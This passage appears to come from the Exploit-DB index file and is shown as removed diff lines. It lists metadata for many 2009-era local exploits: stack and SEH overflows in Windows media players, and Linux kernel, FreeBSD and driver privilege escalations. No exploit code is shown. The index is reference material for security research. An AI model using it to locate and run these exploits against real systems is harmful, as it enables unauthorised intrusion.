-8275,exploits/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local, -8280,exploits/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal",2009-03-24,"Black Security",windows,local, -8299,exploits/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Local Stack Overflow",2009-03-27,Encrypt3d.M!nd,windows,local, -8301,exploits/windows/local/8301.pl,"PowerCHM 5.7 - 'hhp' Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local, -8303,exploits/linux/local/8303.c,"pam-krb5 < 3.13 - Local Privilege Escalation",2009-03-29,"Jon Oberheide",linux,local, -8311,exploits/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,local, -8312,exploits/windows/local/8312.py,"AtomixMP3 < 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local, -8322,exploits/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local, -8343,exploits/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,windows,local, -8369,exploits/linux/local/8369.sh,"Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation",2009-04-08,gat3way,linux,local, -8371,exploits/windows/local/8371.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Buffer Overflow",2009-04-08,AlpHaNiX,windows,local, -8401,exploits/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - html Local Overwrite (SEH)",2009-04-13,dun,windows,local, -8410,exploits/windows/local/8410.pl,"RM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local, -8411,exploits/windows/local/8411.c,"WM Downloader 3.0.0.9 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local, -8412,exploits/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local, -8413,exploits/windows/local/8413.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow",2009-04-13,Stack,windows,local, -8416,exploits/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local, -8420,exploits/windows/local/8420.py,"BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)",2009-04-13,His0k4,windows,local, -8426,exploits/windows/local/8426.pl,"Shadow Stream Recorder - '.m3u' Universal Stack Overflow",2009-04-14,AlpHaNiX,windows,local, -8427,exploits/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow",2009-04-14,Stack,windows,local, -8444,exploits/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal Overwrite (SEH)",2009-04-15,dun,windows,local, -8456,exploits/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX Password hashes",2009-04-16,"Alexander Kornbrust",multiple,local, -8470,exploits/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Local Buffer Overflow",2009-04-17,"Michael Brooks",linux,local, -8478,exploits/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation (1)",2009-04-20,kingcope,linux,local, -8519,exploits/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)",2009-04-22,Stack,windows,local, -8520,exploits/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)",2009-04-22,His0k4,windows,local, -8527,exploits/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow",2009-04-23,Stack,windows,local, -8534,exploits/linux/local/8534.c,"libvirt_proxy 0.5.1 - Local Privilege Escalation",2009-04-27,"Jon Oberheide",linux,local, -8535,exploits/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,windows,local, -8536,exploits/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,windows,local, -8540,exploits/windows/local/8540.c,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,windows,local, -8541,exploits/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' Local Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local, -8572,exploits/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Local Privilege Escalation (2)",2009-04-30,"Jon Oberheide",linux,local, -8580,exploits/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,windows,local, -8582,exploits/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' Overwrite (SEH)",2009-04-30,His0k4,windows,local, -8583,exploits/windows/local/8583.py,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow",2009-05-01,His0k4,windows,local, -8589,exploits/windows/local/8589.py,"RM Downloader - '.smi' Local Stack Overflow",2009-05-01,"ThE g0bL!N",windows,local, -8590,exploits/windows/local/8590.py,"Beatport Player 1.0.0.283 - '.m3u' Local Overwrite (SEH)",2009-05-01,His0k4,windows,local, -8591,exploits/windows/local/8591.py,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)",2009-05-01,Encrypt3d.M!nd,windows,local, -8592,exploits/windows/local/8592.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)",2009-05-01,Stack,windows,local, -8594,exploits/windows/local/8594.pl,"RM Downloader - '.smi' Universal Local Buffer Overflow",2009-05-01,Stack,windows,local, -8595,exploits/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - 'getIcon()' Memory Corruption",2009-05-04,Abysssec,windows,local, -8612,exploits/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",windows,local, -8620,exploits/windows/local/8620.pl,"Sorinara Streaming Audio Player 0.9 - '.m3u' Local Stack Overflow",2009-05-05,Stack,windows,local, -8624,exploits/windows/local/8624.pl,"Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)",2009-05-07,Stack,windows,local, -8628,exploits/windows/local/8628.pl,"RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8629,exploits/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8630,exploits/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8631,exploits/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8632,exploits/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8633,exploits/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8634,exploits/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow",2009-05-07,G4N0K,windows,local, -8637,exploits/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",windows,local, -8640,exploits/windows/local/8640.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow",2009-05-07,Hakxer,windows,local, -8641,exploits/multiple/local/8641.txt,"PHP - 'mb_ereg(i)_replace()' Evaluate Replacement String",2009-05-07,80vul,multiple,local, -8656,exploits/windows/local/8656.py,"MPLAB IDE 8.30 - '.mcp' Universal Overwrite (SEH)",2009-05-11,His0k4,windows,local, -8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,windows,local, -8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,windows,local, -8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local, -8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local, -8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local, -8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,windows,local, -8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,linux,local, -8678,exploits/linux/local/8678.c,"Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation",2009-05-14,prdelka,linux,local, -8698,exploits/windows/local/8698.pl,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow",2009-05-15,hack4love,windows,local, -8701,exploits/windows/local/8701.py,"Audioactive Player 1.93b - '.m3u' Local Buffer Overflow (SEH)",2009-05-15,His0k4,windows,local, -8770,exploits/windows/local/8770.py,"Winamp 5.55 - MAKI Script Universal Overwrite (SEH)",2009-05-22,His0k4,windows,local, -8772,exploits/windows/local/8772.pl,"Winamp 5.55 - MAKI script Universal Integer Overflow",2009-05-22,Encrypt3d.M!nd,windows,local, -8780,exploits/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local, -8782,exploits/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation",2009-05-26,"NT Internals",windows,local, -8783,exploits/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local, -8789,exploits/windows/local/8789.py,"Slayer 2.4 - 'skin' Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local, -8799,exploits/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass",2009-05-26,Abysssec,win_x86,local, -8833,exploits/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local, -8863,exploits/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-06-03,"fl0 fl0w",windows,local, -8875,exploits/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Local Privilege Escalation",2009-06-04,"NT Internals",windows,local, -8881,exploits/windows/local/8881.php,"PeaZIP 2.6.1 - Compressed Filename Command Injection",2009-06-05,Nine:Situations:Group,windows,local, -8896,exploits/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local, -8983,exploits/windows/local/8983.c,"DESlock+ 4.0.2 - 'dlpcrypt.sys' Local Kernel Ring0 Code Execution",2009-06-18,mu-b,windows,local, -9034,exploits/windows/local/9034.pl,"HT-MP3Player 1.0 - '.ht3' Local Buffer Overflow (SEH)",2009-06-29,hack4love,windows,local, -9038,exploits/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local, -9047,exploits/windows/local/9047.pl,"TFM MMPlayer 2.0 - '.m3u'/'.ppl' Universal Buffer Overflow (SEH)",2009-06-30,"ThE g0bL!N",windows,local, -9060,exploits/windows/local/9060.pl,"MP3-Nator 2.0 - '.plf' Universal Buffer Overflow (SEH)",2009-07-01,"ThE g0bL!N",windows,local, -9064,exploits/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local, -9070,exploits/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local, -9072,exploits/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local, -9082,exploits/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Local Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local, -9083,exploits/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local, -9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,multiple,local, -9104,exploits/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local, -9135,exploits/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local, -9136,exploits/windows/local/9136.pl,"Mp3-Nator 2.0 - 'ListData.dat' Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local, -9142,exploits/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local, -9146,exploits/windows/local/9146.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow",2009-07-14,[0]x80->[H]4x²0r,windows,local, -9148,exploits/windows/local/9148.py,"Live For Speed 2 Version Z - '.mpr' Local Buffer Overflow (SEH)",2009-07-14,His0k4,windows,local, -9149,exploits/windows/local/9149.pl,"Icarus 2.0 - '.icp' Local Buffer Overflow (SEH)",2009-07-15,hack4love,windows,local, -9152,exploits/windows/local/9152.pl,"AudioPLUS 2.00.215 - '.m3u' / '.lst' Universal Overwrite (SEH)",2009-07-15,Stack,windows,local, -9172,exploits/windows/local/9172.pl,"Hamster Audio Player 0.3a - Universal Buffer Overflow (SEH)",2009-07-16,"ThE g0bL!N",windows,local, -9177,exploits/windows/local/9177.pl,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Universal Buffer Overflow",2009-07-16,Crazy_Hacker,windows,local, -9186,exploits/windows/local/9186.pl,"Easy RM to MP3 Converter - '.m3u' Universal Stack Overflow",2009-07-17,Stack,windows,local, -9190,exploits/windows/local/9190.pl,"htmldoc 1.8.27.1 - '.html' Universal Stack Overflow",2009-07-17,ksa04,windows,local, -9191,exploits/linux/local/9191.txt,"Linux Kernel 2.6.30 < 2.6.30.1 / SELinux (RHEL 5) - Local Privilege Escalation",2009-07-17,spender,linux,local, -9199,exploits/windows/local/9199.txt,"Adobe 9.x Related Service - 'getPlus_HelperSvc.exe' Local Privilege Escalation",2009-07-20,Nine:Situations:Group,windows,local, -9207,exploits/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation",2009-07-20,anonymous,linux,local, -9208,exploits/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local, -9215,exploits/windows/local/9215.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local, -9216,exploits/windows/local/9216.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (SEH)",2009-07-20,SkuLL-HackeR,windows,local, -9221,exploits/windows/local/9221.pl,"WINMOD 1.4 - '.lst' Local Buffer Overflow (SEH)",2009-07-21,hack4love,windows,local, -9223,exploits/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-21,"Jeremy Brown",windows,local, -9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,windows,local, -9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",windows,local, -40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,windows,local, -9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,windows,local, -9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,windows,local, -9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,windows,local, -9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,windows,local, -9299,exploits/windows/local/9299.pl,"WINMOD 1.4 - '.lst' File Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local, -9301,exploits/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Local Privilege Escalation",2009-07-30,"NT Internals",windows,local, -9302,exploits/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local, -9305,exploits/windows/local/9305.txt,"EPSON Status Monitor 3 - Local Privilege Escalation",2009-07-30,Nine:Situations:Group,windows,local, -9306,exploits/aix/local/9306.txt,"IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite",2009-07-30,Affix,aix,local, -9321,exploits/windows/local/9321.pl,"Destiny Media Player 1.61 - '.pls' Universal Buffer Overflow (SEH)",2009-08-01,"ThE g0bL!N",windows,local, -9329,exploits/windows/local/9329.pl,"BlazeDVD 5.1 Professional - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local, -9343,exploits/windows/local/9343.pl,"Mediacoder 0.6.2.4275 - '.lst' Local Stack Buffer Overflow",2009-08-03,SkuLL-HackeR,windows,local, -9346,exploits/windows/local/9346.pl,"Blaze HDTV Player 6.0 - '.plf' Local Buffer Overflow (SEH)",2009-08-03,hack4love,windows,local, -9352,exploits/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure",2009-08-04,"Jon Oberheide",linux,local, -9354,exploits/windows/local/9354.pl,"Mediacoder 0.7.1.4486 - '.lst' Universal Buffer Overflow (SEH)",2009-08-04,germaya_x,windows,local, -9360,exploits/windows/local/9360.pl,"BlazeDVD 5.1/HDTV Player 6.0 - '.plf' Universal Buffer Overflow (SEH)",2009-08-04,"ThE g0bL!N",windows,local, -9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",linux,local, -9366,exploits/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local, -9375,exploits/windows/local/9375.py,"JetAudio 7.1.9.4030 - '.m3u' Universal Stack Overflow (SEH)",2009-08-06,Dr_IDE,windows,local, -9377,exploits/windows/local/9377.pl,"A2 Media Player Pro 2.51 - '.m3u' / '.m3l' Universal Local Buffer Overflow (SEH)",2009-08-06,hack4love,windows,local, -9379,exploits/windows/local/9379.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' Local Stack Overflow (SEH)",2009-08-06,germaya_x,windows,local, -9386,exploits/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation",2009-08-07,MrDoug,windows,local, -9409,exploits/windows/local/9409.pl,"Mediacoder 0.7.1.4490 - '.lst' / '.m3u' Universal Buffer Overflow (SEH)",2009-08-10,hack4love,windows,local, -9412,exploits/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (1)",2009-08-11,ahwak2000,windows,local, -9418,exploits/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local, -9420,exploits/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - 'wav' Universal Local Buffer (SEH) (3)",2009-08-12,hack4love,windows,local, -9426,exploits/windows/local/9426.java,"FTPShell Client 4.1 RC2 - Name Session Stack Overflow",2009-08-13,zec,windows,local, -9428,exploits/windows/local/9428.pl,"pIPL 2.5.0 - '.PLS' / '.PL' Universal Local Buffer (SEH)",2009-08-13,hack4love,windows,local, -9435,exploits/linux/local/9435.txt,"Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)",2009-08-14,spender,linux,local, -9436,exploits/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Privilege Escalation (4)",2009-08-14,"Przemyslaw Frasunek",linux,local, -9458,exploits/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - '.xpl' Universal Local Buffer (SEH)",2009-08-18,hack4love,windows,local, -9466,exploits/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local, -9476,exploits/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local, -9477,exploits/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Local Privilege Escalation",2009-08-18,Zinx,android,local, -9479,exploits/linux/local/9479.c,"Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local, -9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local, -9486,exploits/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)",2009-08-24,hack4love,windows,local, -9488,exploits/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local, -9489,exploits/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Multiple Vulnerabilities",2009-08-24,kingcope,multiple,local, -9492,exploits/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local, -9495,exploits/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer",2009-08-24,ahwak2000,windows,local, -9501,exploits/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)",2009-08-24,mr_me,windows,local, -9509,exploits/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer (SEH)",2009-08-25,hack4love,windows,local, -9513,exploits/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local, -9519,exploits/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,windows,local, -9520,exploits/multiple/local/9520.txt,"HyperVM - File Permissions Credential Disclosure",2009-08-25,"Xia Shing Zee",multiple,local, -9521,exploits/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local, -9536,exploits/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local, -9540,exploits/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local, -9542,exploits/lin_x86/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",lin_x86,local, -9543,exploits/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local, -9545,exploits/linux/local/9545.c,"Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation",2009-08-31,"Ramon Valle",linux,local, -9548,exploits/windows/local/9548.pl,"Ultimate Player 1.56b - '.m3u' / '.upl' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local, -9550,exploits/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)",2009-08-31,hack4love,windows,local, -9551,exploits/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer (SEH)",2009-08-31,mr_me,windows,local, -9560,exploits/windows/local/9560.txt,"Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow",2009-09-01,hack4love,windows,local, -9567,exploits/windows/local/9567.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local, -9568,exploits/windows/local/9568.py,"akPlayer 1.9.0 - '.plt' Universal Buffer Overflow (SEH)",2009-09-01,TiGeR-Dz,windows,local, -9574,exploits/linux/local/9574.txt,"Linux Kernel < 2.6.19 (x86/x64) - 'udp_sendmsg' Local Privilege Escalation (2)",2009-09-02,spender,linux,local, -9575,exploits/linux/local/9575.c,"Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Privilege Escalation (3)",2009-09-02,Andi,linux,local, -9579,exploits/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal",2009-09-03,kralor,windows,local, -9580,exploits/windows/local/9580.pl,"Hamster Audio Player 0.3a - 'Associations.cfg' Local Buffer (SEH) (2)",2009-09-03,hack4love,windows,local, -9581,exploits/windows/local/9581.pl,"SAP Player 0.9 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-03,PLATEN,windows,local, -9589,exploits/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)",2009-09-04,hack4love,windows,local, -9595,exploits/linux/local/9595.c,"HTMLDOC 1.8.27 - '.html' File Handling Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",linux,local, -9598,exploits/linux/local/9598.txt,"Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Local Privilege Escalation (2)",2009-09-09,"Ramon Valle",linux,local, -9608,exploits/linux/local/9608.c,"GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local, -9610,exploits/windows/local/9610.py,"Audio Lib Player - '.m3u' Local Buffer Overflow (SEH)",2009-09-09,blake,windows,local, -9618,exploits/windows/local/9618.php,"Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local, -9619,exploits/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local, -9624,exploits/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,windows,local, -9627,exploits/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Framework",2009-09-10,spender,linux,local, -9628,exploits/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,windows,local, -9641,exploits/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - 'sock_sendpage()' Local Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local, -9645,exploits/aix/local/9645.sh,"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local, -9655,exploits/windows/local/9655.pl,"Invisible Browsing 5.0.52 - '.ibkey' Local Buffer Overflow",2009-09-14,PLATEN,windows,local, -9659,exploits/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local, -9661,exploits/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local, -9680,exploits/windows/local/9680.txt,"Protector Plus AntiVirus 8/9 - Local Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local, -9687,exploits/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local, -9688,exploits/hardware/local/9688.txt,"NetAccess IP3 - Authenticated Ping Option Command Injection",2009-09-15,r00t,hardware,local, -9709,exploits/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation",2009-09-17,Rick,linux,local, -9807,exploits/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local, -9831,exploits/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local, -9842,exploits/php/local/9842.txt,"PHP 5.3.0 - 'pdflib' Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local, -9844,exploits/linux/local/9844.py,"Linux 